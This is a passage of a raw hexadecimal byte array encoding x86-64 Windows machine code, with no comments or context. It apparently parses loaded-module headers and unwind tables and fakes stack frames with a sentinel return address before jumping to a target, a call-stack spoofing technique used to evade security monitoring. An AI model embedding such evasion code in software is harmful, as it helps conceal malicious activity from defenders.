x00,0x00,0x48,0x8B,0x45,0x20,0x48,0x01,0xD0,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x40,0x07,0x00,0x00,0x85,0xC0,0x0F,0x84,0xDB,0x02,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x54,0x07,0x00,0x00,0x85,0xC0,0x0F,0x84,0x5F,0x01,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x8B,0x00,0x48,0x89,0x45,0xC8,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC1,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x1C,0x05,0x00,0x00,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x1C,0x05,0x00,0x00,0x83,0xE8,0x08,0x89,0x45,0xEC,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x58,0x07,0x00,0x00,0x85,0xC0,0x74,0x04,0x83,0x45,0xEC,0x08,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x28,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x20,0x48,0x89,0xC3,0x48,0x8B,0x55,0xC0,0x48,0x8B,0x45,0x30,0x48,0x89,0xC1,0xE8,0x87,0xF0,0xFF,0xFF,0x48,0x89,0x03,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x18,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x10,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0x83,0xC0,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0xC8,0x48,0x89,0x02,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x58,0x07,0x00,0x00,0x85,0xC0,0x74,0x18,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xEC,0x48,0x01,0xD0,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0xD8,0x48,0x8B,0x92,0x28,0x05,0x00,0x00,0x48,0x89,0x10,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x83,0xE8,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x38,0xE9,0x42,0x01,0x00,0x00,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xE3,0x00,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x30,0x05,0x00,0x00,0x85,0xC0,0x0F,0x84,0xD1,0x00,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x90,0x34,0x05,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x38,0x05,0x00,0x00,0x89,0xC1,0x89,0xD0,0x29,0xC8,0x89,0x45,0xD4,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xEB,0x19,0x48,0x8B,0x45,0x30,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7B,0xFD,0xFF,0xFF,0x83,0x45,0xE8,0x08,0x83,0x45,0xE4,0x01,0x8B,0x45,0xE4,0x3B,0x45,0xD4,0x72,0xDF,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x30,0x48,0x89,0xC1,0xE8,0x5B,0xEF,0xFF,0xFF,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0xC1,0xE8,0x4C,0xFD,0xFF,0xFF,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC1,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x1C,0x05,0x00,0x00,0x2B,0x45,0xE8,0x83,0xE8,0x08,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0xD8,0x48,0x8B,0x92,0x28,0x05,0x00,0x00,0x48,0x89,0x10,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x83,0xE8,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x55,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0xC1,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x1C,0x05,0x00,0x00,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0xD8,0x48,0x8B,0x92,0x28,0x05,0x00,0x00,0x48,0x89,0x10,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x83,0xE8,0x08,0x48,0x89,0xC2,0x48,0x8B,0x45,0x30,0x48,0x89,0x50,0x38,0x48,0x8B,0x45,0xD8,0x8B,0x80,0x20,0x05,0x00,0x00,0x85,0xC0,0x74,0x1B,0x48,0x8B,0x45,0x30,0x48,0x8B,0x40,0x30,0x48,0x89,0x45,0xF8,0x48,0x83,0x45,0xF8,0x08,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x83,0x45,0xF0,0x01,0x8B,0x45,0xF0,0x3B,0x45,0x28,0x0F,0x82,0xE5,0xFC,0xFF,0xFF,0x90,0x90,0x48,0x83,0xC4,0x68,0x5B,0x5D,0xC3,0x48,0x8B,0x04,0x24,0xC3,0x90,0x0F,0x0B,0x48,0x8D,0x44,0x24,0x08,0xC3,0x90,0x0F,0x0B,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xCC,0x3A,0x00,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x0F,0x84,0x8A,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0xF8,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x80,0xA0,0x00,0x00,0x00,0x89,0x45,0xEC,0x48,0x8B,0x45,0xF0,0x8B,0x80,0xA4,0x00,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x74,0x3E,0x48,0x8B,0x45,0x18,0x48,0x8B,0x55,0xF8,0x48,0x89,0x10,0x8B,0x45,0xE8,0x89,0xC2,0xB8,0xAB,0xAA,0xAA,0xAA,0x48,0x0F,0xAF,0xC2,0x48,0xC1,0xE8,0x20,0x89,0xC2,0xC1,0xEA,0x03,0x48,0x8B,0x45,0x28,0x89,0x10,0x8B,0x55,0xEC,0x48,0x8B,0x45,0xF8,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x10,0xEB,0x18,0x48,0x8B,0x45,0x28,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0xEB,0x01,0x90,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x4C,0x8D,0x45,0xD4,0x48,0x8D,0x4D,0xD8,0x48,0x8D,0x55,0xE0,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xF3,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x99,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x48,0x29,0x45,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0x89,0x45,0xF8,0xEB,0x75,0x8B,0x55,0xFC,0x8B,0x45,0xF8,0x01,0xD0,0xD1,0xE8,0x89,0x45,0xF4,0x48,0x8B,0x4D,0xD8,0x8B,0x55,0xF4,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xC8,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x89,0xC0,0x48,0x39,0x45,0x10,0x73,0x08,0x8B,0x45,0xF4,0x89,0x45,0xF8,0xEB,0x37,0x48,0x8B,0x45,0xE8,0x8B,0x40,0x04,0x89,0xC0,0x48,0x39,0x45,0x10,0x72,0x0B,0x8B,0x45,0xF4,0x83,0xC0,0x01,0x89,0x45,0xFC,0xEB,0x1D,0x48,0x8B,0x45,0x18,0x48,0x8B,0x55,0xE8,0x48,0x89,0x10,0x48,0x8B,0x55,0xE0,0x48,0x8B,0x45,0x20,0x48,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x0D,0x8B,0x45,0xF8,0x39,0x45,0xFC,0x72,0x83,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x50,0x5D,0xC3,0xB8,0x30,0x00,0x00,0x00,0x65,0x48,0x8B,0x00,0xC3,0x90,0x0F,0x0B,0x55,0x53,0x48,0x81,0xEC,0xB8,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xB0,0x00,0x00,0x00,0x48,0x89,0x4D,0x20,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x85,0x7C,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x07,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x90,0x00,0x00,0x00,0x00,0xC7,0x45,0x8C,0x08,0x00,0x00,0x00,0x48,0xB8,0xBE,0xBA,0xFE,0xCA,0xEF,0xBE,0xAD,0xDE,0x48,0x89,0x45,0x80,0xE8,0x5A,0xFF,0xFF,0xFF,0x48,0x89,0x45,0x90,0x48,0x8B,0x45,0x90,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xA8,0x48,0x8B,0x45,0x90,0x48,0x8B,0x40,0x08,0x48,0x89,0xC1,0x48,0x8B,0x45,0x90,0x48,0x8B,0x40,0x10,0x48,0x89,0xC2,0x48,0x89,0xC8,0x48,0x29,0xD0,0x48,0x89,0x45,0xA0,0x48,0x8B,0x05,0xDC,0x59,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x40,0xDD,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xCD,0x59,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xB8,0x48,0x83,0x7D,0xB8,0x00,0x0F,0x84,0xB5,0x03,0x00,0x00,0x81,0x7D,0x28,0x0F,0x2A,0x9B,0xCD,0x75,0x15,0x48,0x8D,0x95,0x7C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0xE3,0xEE,0xFF,0xFF,0xEB,0x14,0x48,0x8D,0x95,0x7C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0xF4,0xEF,0xFF,0xFF,0x90,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xF8,0x1E,0x0F,0x87,0x77,0x03,0x00,0x00,0x8B,0x95,0x7C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0x84,0xF8,0xFF,0xFF,0x8B,0x45,0x8C,0x0F,0xAF,0x45,0x9C,0x89,0xC3,0x48,0x8B,0x05,0x51,0x59,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x45,0x59,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x33,0x03,0x00,0x00,0x8B,0x45,0x8C,0x48,0x01,0x45,0xF0,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xEB,0x40,0x8B,0x45,0xCC,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x80,0x40,0x07,0x00,0x00,0x85,0xC0,0x74,0x1F,0x8B,0x45,0xCC,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x80,0x1C,0x05,0x00,0x00,0x89,0xC0,0x48,0x01,0x45,0xF0,0x83,0x45,0xCC,0x01,0x8B,0x55,0xCC,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x39,0xC2,0x72,0xB3,0x8B,0x45,0x8C,0x48,0x01,0x45,0xF0,0x8B,0x45,0x8C,0x48,0x01,0x45,0xF0,0x8B,0x45,0x8C,0x48,0x23,0x45,0xF0,0x48,0x89,0xC2,0x8B,0x45,0x8C,0x48,0x39,0xC2,0x75,0x0A,0x8B,0x45,0x8C,0x01,0xC0,0x89,0x45,0xDC,0xEB,0x06,0x8B,0x45,0x8C,0x89,0x45,0xDC,0x8B,0x45,0xDC,0x48,0x01,0x45,0xF0,0x48,0x8B,0x05,0x91,0x58,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x81,0x58,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x0F,0x84,0x72,0x02,0x00,0x00,0x48,0x8B,0x05,0x61,0x58,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xA0,0x49,0x89,0xD0,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x51,0x58,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x45,0x02,0x00,0x00,0x48,0x8B,0x55,0xA8,0x48,0x8B,0x45,0xA0,0x48,0x01,0xD0,0x48,0x2B,0x45,0xF0,0x48,0x89,0x45,0xB0,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xEB,0x64,0x8B,0x45,0xC8,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x80,0x40,0x07,0x00,0x00,0x85,0xC0,0x74,0x43,0x8B,0x45,0xC8,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x48,0x8B,0x80,0x28,0x05,0x00,0x00,0x48,0x85,0xC0,0x74,0x24,0x8B,0x45,0xC8,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x48,0x8B,0x90,0x28,0x05,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x48,0xEB,0x11,0x83,0x45,0xC8,0x01,0x8B,0x55,0xC8,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x39,0xC2,0x72,0x8F,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xA8,0x48,0x89,0x10,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xA0,0x48,0x89,0x50,0x08,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xE8,0x48,0x89,0x50,0x10,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xE0,0x48,0x89,0x50,0x18,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xF0,0x48,0x89,0x50,0x20,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xB0,0x48,0x89,0x50,0x28,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x18,0x48,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x20,0x48,0x01,0xD0,0x48,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xD0,0x48,0x89,0x50,0x50,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0xDC,0x48,0x29,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0x8C,0x48,0x29,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0xD0,0x48,0x89,0x10,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x8B,0x45,0x8C,0x48,0x29,0xC2,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x40,0x30,0x48,0x8B,0x55,0x80,0x48,0x89,0x10,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x89,0x50,0x40,0x8B,0x95,0x7C,0xFF,0xFF,0xFF,0x48,0x8B,0x4D,0x20,0x48,0x8B,0x45,0xB8,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xA2,0xF6,0xFF,0xFF,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x30,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0x59,0xE8,0xFF,0xFF,0x48,0x8B,0x55,0x20,0x48,0x89,0x42,0x30,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x38,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0x3D,0xE8,0xFF,0xFF,0x48,0x8B,0x55,0x20,0x48,0x89,0x42,0x38,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x40,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0x21,0xE8,0xFF,0xFF,0x48,0x8B,0x55,0x20,0x48,0x89,0x42,0x40,0xC7,0x45,0xC4,0x01,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xEB,0x2C,0x8B,0x45,0xC0,0x48,0x98,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x80,0x40,0x07,0x00,0x00,0x85,0xC0,0x74,0x0B,0x83,0x7D,0xC4,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0x83,0x45,0xC0,0x01,0x8B,0x55,0xC0,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x39,0xC2,0x72,0xC7,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x28,0x48,0x83,0x7D,0xE0,0x00,0x74,0x21,0x48,0x8B,0x05,0xDE,0x55,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD6,0x55,0x01,0x00,0xFF,0xD0,0x83,0x7D,0xFC,0x00,0x75,0x28,0x48,0x83,0x7D,0xE8,0x00,0x74,0x21,0x48,0x8B,0x05,0xB0,0x55,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA8,0x55,0x01,0x00,0xFF,0xD0,0x83,0x7D,0xFC,0x00,0x75,0x28,0x48,0x83,0x7D,0xD0,0x00,0x74,0x21,0x48,0x8B,0x05,0x82,0x55,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xD0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x7A,0x55,0x01,0x00,0xFF,0xD0,0x48,0x83,0x7D,0xB8,0x00,0x74,0x21,0x48,0x8B,0x05,0x5A,0x55,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xB8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x52,0x55,0x01,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xB8,0x00,0x00,0x00,0x5B,0x5D,0xC3,0x41,0x5B,0x48,0x31,0xC0,0x48,0x8B,0x51,0x08,0x4C,0x8B,0x41,0x10,0x4C,0x8B,0x09,0x45,0x8A,0x14,0x01,0x45,0x88,0x14,0x00,0x48,0xFF,0xC0,0x48,0x39,0xD0,0x75,0xF0,0x48,0x31,0xC0,0x4C,0x8B,0x41,0x18,0x4C,0x8B,0x49,0x28,0x48,0x8B,0x51,0x20,0x45,0x8A,0x14,0x00,0x45,0x88,0x14,0x01,0x48,0xFF,0xC0,0x48,0x39,0xD0,0x75,0xF0,0x48,0x8B,0x41,0x40,0x48,0x8B,0x40,0x08,0x48,0x8B,0x51,0x08,0x48,0x89,0x10,0x48,0x8B,0x51,0x10,0x48,0x89,0x50,0x08,0x48,0x8B,0x11,0x48,0x89,0x50,0x10,0x48,0x89,0x58,0x18,0x48,0x89,0x68,0x20,0x48,0x89,0x60,0x28,0x4C,0x89,0x58,0x30,0x48,0x31,0xC0,0x8B,0x41,0x5C,0x49,0x89,0xCA,0x83,0xF8,0x01,0x7C,0x3A,0x49,0x8B,0x4A,0x60,0x83,0xF8,0x02,0x7C,0x31,0x49,0x8B,0x52,0x68,0x83,0xF8,0x03,0x7C,0x28,0x4D,0x8B,0x42,0x70,0x83,0xF8,0x04,0x7C,0x1F,0x4D,0x8B,0x4A,0x78,0x83,0xE8,0x04,0x49,0x8B,0x6A,0x30,0x83,0xF8,0x01,0x7C,0x0F,0x49,0x8B,0x5C,0xC2,0x78,0x48,0x89,0x5C,0xC5,0x20,0x48,0xFF,0xC8,0xEB,0xEC,0x49,0x8B,0x62,0x30,0x49,0x8B,0x6A,0x38,0x41,0x8B,0x42,0x50,0x4D,0x8B,0x5A,0x48,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x55,0x57,0x53,0x48,0x81,0xEC,0xC0,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xC0,0x00,0x00,0x00,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0xC7,0x45,0xFC,0x01,0x00,0x00,0xC0,0x48,0x8D,0x95,0x70,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0B,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x68,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0x30,0x48,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0x20,0x89,0xC1,0xE8,0x33,0x71,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x95,0x01,0x00,0x00,0x8B,0x45,0x20,0x89,0xC1,0xE8,0xBE,0x70,0x00,0x00,0x89,0x45,0xD4,0x83,0x7D,0xD4,0x00,0x0F,0x84,0x81,0x01,0x00,0x00,0x8B,0x55,0x20,0x48,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0xFD,0xF8,0xFF,0xFF,0x89,0x45,0xD0,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x65,0x01,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0C,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x02,0x48,0x89,0x45,0xF0,0x48,0x8D,0x95,0x68,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xB7,0x06,0x00,0x00,0x89,0x45,0xD0,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x2D,0x01,0x00,0x00,0x48,0x8B,0x05,0x5A,0x53,0x01,0x00,0xFF,0xD0,0x41,0xB8,0xB0,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x4B,0x53,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x01,0x01,0x00,0x00,0x48,0x8B,0x95,0x70,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xE8,0x48,0x89,0x10,0x48,0x8B,0x95,0x78,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x08,0x48,0x8B,0x55,0x80,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x10,0x48,0x8B,0x55,0x88,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x18,0x48,0x8B,0x55,0x90,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x20,0x48,0x8B,0x55,0x98,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x28,0x48,0x8B,0x55,0xA0,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x30,0x48,0x8B,0x55,0xA8,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x38,0x48,0x8B,0x55,0xB0,0x48,0x8B,0x45,0xE8,0x48,0x89,0x50,0x40,0x48,0x8B,0x45,0xE8,0xC7,0x40,0x54,0x00,0x00,0x00,0x00,0xE8,0x71,0x70,0x00,0x00,0x48,0x8B,0x55,0xE8,0x89,0x42,0x58,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x55,0xD8,0x48,0x89,0x50,0x48,0x48,0x8B,0x45,0xE8,0x8B,0x55,0xD4,0x89,0x50,0x50,0x48,0x8B,0x45,0xE8,0x8B,0x55,0x28,0x89,0x50,0x5C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xEB,0x2B,0x48,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x48,0x8D,0x50,0x08,0x48,0x89,0x95,0x60,0xFF,0xFF,0xFF,0x48,0x8B,0x10,0x48,0x8B,0x45,0xE8,0x8B,0x4D,0xE4,0x48,0x63,0xC9,0x48,0x83,0xC1,0x0C,0x48,0x89,0x14,0xC8,0x83,0x45,0xE4,0x01,0x8B,0x45,0xE4,0x3B,0x45,0x28,0x72,0xCD,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x0F,0xFD,0xFF,0xFF,0x89,0x45,0xFC,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xE8,0x00,0x74,0x21,0x48,0